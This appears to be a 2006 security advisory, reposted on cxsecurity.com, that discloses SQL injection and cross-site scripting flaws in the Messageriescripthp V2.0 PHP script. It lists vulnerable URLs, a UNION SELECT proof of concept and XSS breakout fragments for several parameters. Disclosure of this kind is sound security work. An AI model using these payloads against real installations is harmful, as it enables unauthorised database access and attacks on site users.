Messageriescripthp V2.0 XSS & SQL Injection

2006.12.14
Credit: Mr_Kaliman
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

Messageriescripthp V2.0 ----------------------- Vendor site: http://www.scripthp.com/ Product: Messageriescripthp V2.0 Vulnerability: XSS & SQL Injection Vulnerability Credits: Mr_KaLiMaN Reported to Vendor: 01/12/06 Public disclosure: 09/12/06 Description: ------------ SQL Injection Vulnerability: http://[victim]/[script_messagerie_path]/lire-avis.php?aa=[SQL INJECTION] POC: http://[victim]/[script_messagerie_path]/membre/fiche_tousmembres.php?re cordID=0 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM etc...# XSS http://[victim]/[script_messagerie_path]/existepseudo.php?pseudo=[XSS] http://[victim]/[script_messagerie_path]/existeemail.php?email=[XSS] http://[victim]/[script_messagerie_path]/Contact/contact.php?pageName=</ title>[XSS] http://[victim]/[script_messagerie_path]/Contact/contact.php?cssform=">[ XSS]<foo


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top